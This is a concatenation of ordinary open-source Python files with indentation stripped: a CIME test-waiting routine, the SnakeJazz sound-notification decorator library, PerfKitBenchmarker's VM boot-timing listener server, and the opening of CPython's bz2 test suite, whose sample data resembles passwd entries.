else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False, no_run=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise CIMEError("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False,
no_run=False,
update_success=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if update_success:
caseroot = os.path.dirname(test_data[0])
with Case(caseroot, read_only=True) as case:
srcroot = case.get_value("SRCROOT")
baseline_root = case.get_value("BASELINE_ROOT")
save_test_success(baseline_root, srcroot, test_name, test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS])
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
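# Minimal usage sketch (assumption, not from the original module: the path
# points at a CIME test case directory containing a TestStatus file):
#
#   ok = wait_for_tests(["/scratch/tests/SMS.f19_g16.A.mymachine_gnu"])
#   print("ALL PASS" if ok else "FAILURES")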
|
snakejazz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the
# SnakeJazz Project (https://github.com/mchalela/SnakeJazz/).
# Copyright (c) 2020, Martin Chalela
# License: MIT
# Full Text: https://github.com/mchalela/SnakeJazz/blob/master/LICENSE
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# DOCS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
SnakeJazz.
Listen to the running status of your ~~Snake~~ Python functions.
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# IMPORTS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import multiprocessing as mp
import os
from contextlib import redirect_stdout
from functools import partial, wraps
# Hide print message at import
os.environ["PYGAME_HIDE_SUPPORT_PROMPT"] = "hide"
import pygame
from validator_collection import checkers
from youtube_dl import YoutubeDL
from . import sounds
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# CONSTANTS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DEFAULT_START = sounds.RHODESMAS["connected-01.wav"]
DEFAULT_FINISH = sounds.RHODESMAS["disconnected-01.wav"]
DEFAULT_ERROR = sounds.RHODESMAS["failure-01.wav"]
DEFAULT_URL_START = sounds.RICK_AND_MORTY
DEFAULT_URL_FINISH = sounds.RICK_AND_MORTY
DEFAULT_URL_ERROR = sounds.RICK_AND_MORTY
DEFAULT_RATTLE = sounds.RICK_AND_MORTY
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# EXCEPTIONS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class SnakeNotFoundError(FileNotFoundError):
"""Raised when the file can't be found."""
pass
class URLError(OSError):
"""Raised when the url is invalid."""
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# PRIVATE FUNCTIONS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def _parse_param(param, default):
if param is not None and not isinstance(param, (bool, str)):
raise ValueError(f"Invalid parameter input {param}.")
if param is None or param is False:
return False
elif param is True:
return default
elif os.path.isfile(str(param)):
return str(param)
else:
raise SnakeNotFoundError(f"The snake file {param} doesn't exists.")
def _parse_url(param, default):
if param is not None and not isinstance(param, (bool, str)):
raise ValueError(f"Invalid parameter input {param}.")
if param is None or param is False:
return False
elif param is True:
return default
elif checkers.is_url(str(param)):
return str(param)
else:
raise URLError(f"Invalid url: {param}")
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# SOUND PLAYER
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def play_sound(sound_path, loops=0):
"""Reproduce the sound.
The library PyGame is used to reproduce sounds.
Parameters
----------
sound_path: string, path
Path to the sound file.
loops: int
Number of times the sound will be played.
0: A single time
-1: Infinite loop
"""
pygame.mixer.init()
pygame.mixer.music.load(sound_path)
pygame.mixer.music.play(loops=loops)
while pygame.mixer.music.get_busy():
continue
pygame.mixer.music.unload()
return
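# Example usage (a sketch; the .wav paths are placeholders):
#
#   play_sound("/path/to/chime.wav")             # play once, blocks until done
#   play_sound("/path/to/alarm.wav", loops=-1)   # loop forever (never returns)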
def get_sound(
yt_url=None,
yt_id="ahgcD1xjRiQ",
use_cache=True,
):
"""Download the sound.
The youtube-dl library is used to download sounds.
Parameters
----------
yt_url: string, link
Youtube link. The audio will be extracted from the video.
yt_id: str, id
Youtube video id. If this is given, the full url will be
completed as https://www.youtube.com/watch?v=yt_id
use_cache: bool
When True, a sound will be downloaded just once and saved
for later use if needed.
"""
# Build the video url
if yt_url is None:
yt_url = f"https://www.youtube.com/watch?v={yt_id}"
else:
# = for long urls and / for short urls
s = "=" if "=" in yt_url else "/"
yt_id = yt_url.split(s)[-1]
# Build the final output path
sound_path = str(sounds.DOWNLOAD_PATH / f"{yt_id}.wav")
# If cached then don't download again
if use_cache and os.path.isfile(sound_path):
return sound_path
# Prepare the parameters needed by youtube_dl
outtmpl = str(sounds.DOWNLOAD_PATH / "%(id)s.%(ext)s")
ydl_opts = {
"format": "bestaudio/best",
"outtmpl": outtmpl,
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "wav",
"preferredquality": "120",
}
],
}
# Download the audio. Disable all prints
with open(os.devnull, "w") as fp, redirect_stdout(fp):
with YoutubeDL(ydl_opts) as ydl:
ydl.download([yt_url])
if not os.path.isfile(sound_path):
raise SnakeNotFoundError("Ups! Something went wrong.")
return sound_path
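# Example usage (sketch; uses the default video id shipped above, and the
# second call returns the cached file thanks to use_cache=True):
#
#   path = get_sound(yt_url="https://www.youtube.com/watch?v=ahgcD1xjRiQ")
#   path = get_sound(yt_id="ahgcD1xjRiQ")   # cache hit, no re-download
#   play_sound(path)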
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# DECORATOR
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def zzz(method=None, *, when_start=False, when_finish=True, when_error=False):
"""Sound decorator to notify the execution status of a function.
Parameters
----------
method: callable
Function, class method or any callable object. SnakeJazz will track
the starting and finishing events and play the desired sound.
when_start: string, path, optional
Path to the sound file that will be played at the same instant that
the execution of 'method' starts. A new process handles the
reproduction of the sound.
when_finish: string, path, optional
Path to the sound file that will be played at the same instant that
the execution of 'method' ends. A new process handles the
reproduction of the sound.
when_error: string, path, optional
Path to the sound file that will be played if an exception occurs
during the execution of 'method'. If an error occurs, no finishing
sound is played. A new process handles the reproduction of the sound.
Notes
-----
SnakeJazz uses PyGame API to reproduce sounds.
The default sounds distributed with SnakeJazz belong to the respective
creators.
Rhodesmas:
>> Downloaded from https://freesound.org/people/rhodesmas/packs/17958/
"""
@wraps(method)
def wrapper(*args, **kwargs):
start = _parse_param(when_start, default=DEFAULT_START)
finish = _parse_param(when_finish, default=DEFAULT_FINISH)
error = _parse_param(when_error, default=DEFAULT_ERROR)
# START SOUND ----------------------------------------------------
if start:
start_proc = mp.Process(target=play_sound, args=(start,))
start_proc.start()
# EXECUTION ----------------------------------------------------
# Catch momentarily any exception to determine
# if the sound must be played
if error:
try:
output = method(*args, **kwargs)
except Exception as exc:
error_occurred = True
raise exc
else:
error_occurred = False
finally:
if error_occurred:
if start:
start_proc.terminate()
error_proc = mp.Process(target=play_sound, args=(error,))
error_proc.start()
else:
output = method(*args, **kwargs)
error_occurred = False
if start:
start_proc.terminate()
# FINISH SOUND ----------------------------------------------------
if finish and not error_occurred:
finish_proc = mp.Process(target=play_sound, args=(finish,))
finish_proc.start()
return output
# Return wrapper depending on the type of 'method'.
# It's a function if it's used as `@snakejazz.zzz`
# but ``None`` if used as `@snakejazz.zzz()`.
if method is None:
return partial(
zzz,
when_start=when_start,
when_finish=when_finish,
when_error=when_error,
)
else:
return wrapper
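# Usage sketch (my_task is a hypothetical function; the .wav path is a
# placeholder):
#
#   @zzz                      # bare form: plays the default finish sound
#   def my_task():
#       ...
#
#   @zzz(when_start=True, when_error="boom.wav")   # parametrized form
#   def my_task():
#       ...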
def www(method=None, *, when_start=False, when_finish=True, when_error=False):
"""Sound decorator to notify the execution status of a function.
Parameters
----------
method: callable
Function, class method or any callable object. SnakeJazz will track
the starting and finishing events and play the desired sound.
when_start: string, link, optional
Youtube link to the audio that will be played at the same instant that
the execution of 'method' starts. A new process handles the
reproduction of the sound.
when_finish: string, link, optional
Youtube link to the audio that will be played at the same instant that
the execution of 'method' ends. A new process handles the
reproduction of the sound.
when_error: string, link, optional
Youtube link to the audio that will be played if an exception occurs
during the execution of 'method'. If an error occurs, no finishing
sound is played. A new process handles the reproduction of the sound.
Notes
-----
SnakeJazz uses PyGame API to reproduce sounds and YoutubeDL to
download audio from youtube videos.
The default sounds distributed with SnakeJazz belong to the respective
creators.
Rhodesmas:
>> Downloaded from https://freesound.org/people/rhodesmas/packs/17958/
"""
start_url = _parse_url(when_start, default=DEFAULT_URL_START)
finish_url = _parse_url(when_finish, default=DEFAULT_URL_FINISH)
error_url = _parse_url(when_error, default=DEFAULT_URL_ERROR)
start = get_sound(yt_url=start_url) if start_url else False
finish = get_sound(yt_url=finish_url) if finish_url else False
error = get_sound(yt_url=error_url) if error_url else False
# Return wrapper depending on the type of 'method'.
# It's a function if it's used as `@snakejazz.www`
# but ``None`` if used as `@snakejazz.www()`.
if method is None:
return partial(
zzz,
when_start=start,
when_finish=finish,
when_error=error,
)
else:
return zzz(
method=method,
when_start=start,
when_finish=finish,
when_error=error,
)
def rattle(method=None, *, zound=None, url=DEFAULT_RATTLE):
"""Reproduce the sound in loop until the execution is completed.
Parameters
----------
method: callable
Function, class method or any callable object. SnakeJazz will track
the starting and finishing events and play the desired sound.
zound: string, path, optional
Path to the sound file that will be played during the execution
of 'method'. A new process handles the reproduction of the sound.
url: string, path, optional
Youtube link to the audio that will be played during the execution
of 'method'. A new process handles the reproduction of the sound.
Notes
-----
SnakeJazz uses PyGame API to reproduce sounds and YoutubeDL to
download audio from youtube videos.
The default sounds distributed with SnakeJazz belong to the respective
creators.
Rhodesmas:
>> Downloaded from https://freesound.org/people/rhodesmas/packs/17958/
"""
@wraps(method)
def wrapper(*args, **kwargs):
if zound is None and isinstance(url, str):
sound_path = get_sound(yt_url=url)
elif isinstance(zound, str):
sound_path = _parse_param(zound, default=None)
else:
raise ValueError("Either 'zound' or 'url' must be given.")
proc = mp.Process(target=play_sound, args=(sound_path, -1))
try:
# START SOUND ----------------------------------------------------
proc.start()
# EXECUTION ----------------------------------------------------
return method(*args, **kwargs)
finally:
proc.terminate()
# Return wrapper depending on the type of 'method'.
# It's a function if it's used as `@snakejazz.rattle`
# but ``None`` if used as `@snakejazz.rattle()`.
if method is None:
return partial(
rattle,
zound=zound,
url=url,
)
else:
return wrapper
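# Usage sketch (hypothetical function and placeholder path; the sound loops
# until the function returns or raises):
#
#   @rattle(zound="/path/to/elevator_music.wav")
#   def long_computation():
#       ...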
|
listener_server.py | # Copyright 2020 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Server to wait for incoming curls from booted VMs for large scale boot.
The large scale boot benchmark spins up launcher vms which, in turn, spin up
boot vms and measure their boot time. The launcher vm is an empty linux vm
that could be on any cloud. In order to ensure portability, the listening
server is an http server written in python.
This script is downloaded onto cloud launcher VMs by the benchmark. It will
wait for incoming curl requests from booted vms. When it gets an incoming curl
request, it first double checks that the other vm is a valid vm and is
reachable, then records the system time in nanoseconds.
"""
import functools
from http import server
import logging
import multiprocessing
import os
import subprocess
import sys
import threading
import time
# Amount of time in seconds to attempt calling a client VM if VM calling in.
MAX_TIME_SECONDS = 30
# Amount of time in seconds to attempt calling a client VM if VM not calling in.
MAX_TIME_SECONDS_NO_CALLING = 1200
# entry to stop processing from the timing queue
_STOP_QUEUE_ENTRY = 'stop'
# Tag for undefined hostname, should be synced with large_scale_boot_benchmark.
UNDEFINED_HOSTNAME = 'UNDEFINED'
# Tag for sequential hostname, should be synced with large_scale_boot_benchmark.
SEQUENTIAL_IP = 'SEQUENTIAL_IP'
# Multiplier for nanoseconds
NANO = 1e9
def ConfirmIPAccessible(client_host, port, timeout=MAX_TIME_SECONDS):
"""Confirm the given host's port is accessible and return the access time."""
netcat_command = 'nc -zv -w 1 {client} {port}'.format(
client=client_host,
port=port)
start_time = time.time()
while time.time() <= (start_time + timeout):
p = subprocess.Popen(netcat_command, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = p.communicate()
# different versions of netcat use different stderr strings.
if any(word in stderr.decode('utf-8') for word in ['open', 'succeeded']):
# return the system time in nanoseconds
return 'Pass:%s:%d' % (client_host, time.time() * NANO)
logging.warning('Could not netcat to port %s on client vm %s.',
port, client_host)
return 'Fail:%s:%d' % (client_host, time.time() * NANO)
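# For illustration: a reachable host yields a result string shaped like
# 'Pass:10.0.0.5:1600000000000000000' (host plus system time in nanoseconds);
# an unreachable host yields the same shape prefixed with 'Fail:'.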
def WaitForRunningStatus(client_host, timeout=MAX_TIME_SECONDS):
"""Wait for the VM to report running status.
Status command generated from data/large_scale_boot/vm_status.sh.jinja2.
Args:
client_host: client host to check for running status.
timeout: Max timeout to wait before declaring failure.
Returns:
host status string.
"""
with open('/tmp/pkb/vm_status.sh', 'r') as reader:
command = reader.read()
start_time = time.time()
while time.time() <= (start_time + timeout):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
universal_newlines=True, stderr=subprocess.PIPE)
status, _ = p.communicate()
if 'running' in status.lower():
return 'Running:%s:%d' % (client_host, time.time() * NANO)
logging.warning('Client vm %s not running yet.', client_host)
return 'Fail:%s:%d' % (client_host, time.time() * NANO)
def StoreResult(result_str, queue):
"""Stores a given result string to results queue."""
if result_str:
queue.put(result_str)
def WriteResultsToFile(results_path, queue):
"""Write anything in results queue to a file."""
with open(results_path, 'a') as writer:
while True:
result = queue.get()
if result == _STOP_QUEUE_ENTRY:
logging.info('Told to stop writing to file %s from queue', results_path)
return
writer.write('{}\n'.format(result))
writer.flush()
def BuildHostNames(name_pattern, count, use_public_ip):
"""Derieve host names from either name pattern or boot logs.
See large_scale_boot benchmark for name_pattern. For example, SEQUENTIAL_IP
name pattern is in the form of 'SEQUENTIAL_IP_{public_dns}_{start_index}'.
Args:
name_pattern: Name pattern to build host names with.
count: count of vms.
use_public_ip: hostnames should be public ip.
Returns:
hostnames or host ips to access.
"""
if name_pattern == UNDEFINED_HOSTNAME:
return WaitForHostNames(use_public_ip)
elif SEQUENTIAL_IP in name_pattern:
public_dns = name_pattern.split('_')[-2]
start_vm_index = int(name_pattern.split('_')[-1])
if public_dns:
return [public_dns.replace('VMID', str(vm_id))
for vm_id in range(start_vm_index, count + start_vm_index)]
else:
return GenerateHostIPs(start_vm_index, count)
else:
return [name_pattern.replace('VM_ID', str(vm_id))
for vm_id in range(1, count + 1)]
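# For illustration (assumed values): BuildHostNames(
#     'SEQUENTIAL_IP_host-VMID.example.com_3', count=2, use_public_ip=True)
# returns ['host-3.example.com', 'host-4.example.com']; with an empty
# public_dns segment it falls back to GenerateHostIPs(3, 2).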
def WaitForHostNames(use_public_ip, timeout=MAX_TIME_SECONDS_NO_CALLING):
"""Wait for boot logs to complete and grep the newly created ips.
After boot_script.sh completes, it will print out [completed].
In the boot_script.sh output, lines will have the following formats:
GCP:
networkInterfaces[0].accessConfigs[0].natIP: 34.94.81.165
AWS:
PRIVATEIPADDRESSES True ip-10-0-0-143.ec2.internal 10.0.0.143
ASSOCIATION amazon ec2-100-24-107-67.compute-1.amazonaws.com 100.24.107.67
Args:
use_public_ip: whether to use public_ip hostname.
timeout: Amount of time in seconds to wait for boot.
Returns:
hosts to netcat.
"""
start_time = time.time()
while time.time() <= (start_time + timeout):
if os.system('grep completed log') != 0:
time.sleep(1)
continue
with open('log', 'r') as f:
hostnames = []
for line in f:
# look for GCP public ip
if 'natIP' in line:
hostnames.append(line.split()[1])
# look for amazon public ip if set
if use_public_ip and 'ASSOCIATION' in line:
hostnames.append(line.split()[3])
# look for amazon private ip if public ip is not set
if not use_public_ip and 'PRIVATEIPADDRESSES' in line:
hostnames.append(line.split()[2])
return set(hostnames)
raise ValueError('Boot did not complete successfully before timeout of %s '
'seconds.' % timeout)
def GenerateHostIPs(boot_vm_index, count):
"""Logic must be aligned with large_scale_boot/boot_script.sh."""
hostnames = []
for vm_id in range(boot_vm_index, boot_vm_index + count):
hostnames.append('10.0.{octet3}.{octet4}'.format(
octet3=vm_id // 256,
octet4=vm_id % 256))
return hostnames
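# Worked example: vm_id 300 maps to 10.0.1.44 (300 // 256 == 1,
# 300 % 256 == 44), while vm_id 5 maps to 10.0.0.5.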
def ActAsClient(pool, queue, port, name_pattern, vms_count, use_public_ip):
"""Use as a client."""
store_results = functools.partial(StoreResult, queue=queue)
all_jobs = []
for host_name in BuildHostNames(name_pattern, vms_count, use_public_ip):
job = pool.apply_async(
ConfirmIPAccessible,
args=(host_name, port, MAX_TIME_SECONDS_NO_CALLING,),
callback=store_results)
all_jobs.append(job)
if vms_count == 1:
status_job = pool.apply_async(
WaitForRunningStatus,
args=(host_name, MAX_TIME_SECONDS_NO_CALLING,),
callback=store_results)
all_jobs.append(status_job)
logging.info([async_job.get() for async_job in all_jobs])
queue.put(_STOP_QUEUE_ENTRY)
def ActAsServer(pool, queue, port, host_name, listening_server):
"""Use as a server."""
handler = functools.partial(RequestHandler, pool, host_name, queue, port)
listener = server.HTTPServer(listening_server, handler)
logging.info('Starting httpserver...\n')
try:
listener.serve_forever()
except KeyboardInterrupt:
logging.info('^C received, shutting down server')
listener.server_close()
queue.put(_STOP_QUEUE_ENTRY)
class RequestHandler(server.BaseHTTPRequestHandler):
"""Request handler for incoming curl requests from booted vms."""
def __init__(self, pool, launcher, queue, access_port, *args, **kwargs):
"""Creates a RequestHandler for a http request received by the server.
Args:
pool: multiprocessing process pool object.
launcher: name string of the launcher vm that the server is on.
queue: multiprocessing queue object.
access_port: port number to call on the booted vms.
*args: Other arguments to apply to the request handler.
**kwargs: Keyword arguments to apply to the request handler.
"""
self.process_pool = pool
self.launcher = launcher
self.timing_queue = queue
self.access_port = access_port
# BaseHTTPRequestHandler calls do_GET inside __init__
# So we have to call super().__init__ after setting attributes.
super(RequestHandler, self).__init__(*args, **kwargs)
def do_GET(self): # pylint: disable=g-bad-name
"""Process GET requests."""
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('OK', 'UTF-8'))
# Check that we are not getting random curls on the internet.
client_host = self.client_address[0]
client_check_str = self.headers.get('X-Header', None)
if client_check_str != self.launcher:
logging.error('Got curl with unknown X-Header: %s', client_check_str)
self.shutdown()
return
# Process this client
logging.info(client_host)
store_results_func = functools.partial(StoreResult, queue=self.timing_queue)
self.process_pool.apply_async(ConfirmIPAccessible,
args=(client_host, self.access_port,),
callback=store_results_func)
def shutdown(self):
"""Shut down the server."""
t = threading.Thread(target=self.server.shutdown)
logging.info('Server shut down.')
t.start()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
if len(sys.argv) != 9:
raise ValueError('Got unexpected number of command-line arguments. '
'There should be exactly 8 command-line arguments: '
'1. name of the server vm, '
'2. server port, '
'3. results file, '
'4. port to access the boot VMs, '
'5. whether to use the listening server, '
'6. launched vm naming pattern, '
'7. number of launched vms, '
'8. whether to use public ip address.')
hostname = sys.argv[1]
server_address = ('', int(sys.argv[2]))
results_file_path = sys.argv[3]
clients_port = sys.argv[4]
use_listening_server = sys.argv[5] == 'True'
vms_name_pattern = sys.argv[6]
num_vms = int(sys.argv[7])
using_public_ip = sys.argv[8] == 'True'
process_pool = multiprocessing.Pool()
multiprocessing_manager = multiprocessing.Manager()
timing_queue = multiprocessing_manager.Queue()
# Start the worker to move results from queue to file first.
process_pool.apply_async(WriteResultsToFile,
args=(results_file_path, timing_queue,))
if use_listening_server:
ActAsServer(process_pool, timing_queue, clients_port, hostname,
server_address)
# The server then listens and puts results on the queue.
else:
ActAsClient(process_pool, timing_queue, clients_port,
vms_name_pattern, num_vms, using_public_ip)
|
test_bz2.py | from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import random
import shutil
import subprocess
import sys
from test.support import unlink
import _compression
try:
import threading
except ImportError:
threading = None
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100 kB, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
self.filename = support.TESTFN
def tearDown(self):
if os.path.isfile(self.filename):
os.unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
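# Shrink the raw read buffer to exactly one compressed stream so every raw
# read ends precisely on a stream boundary.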
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
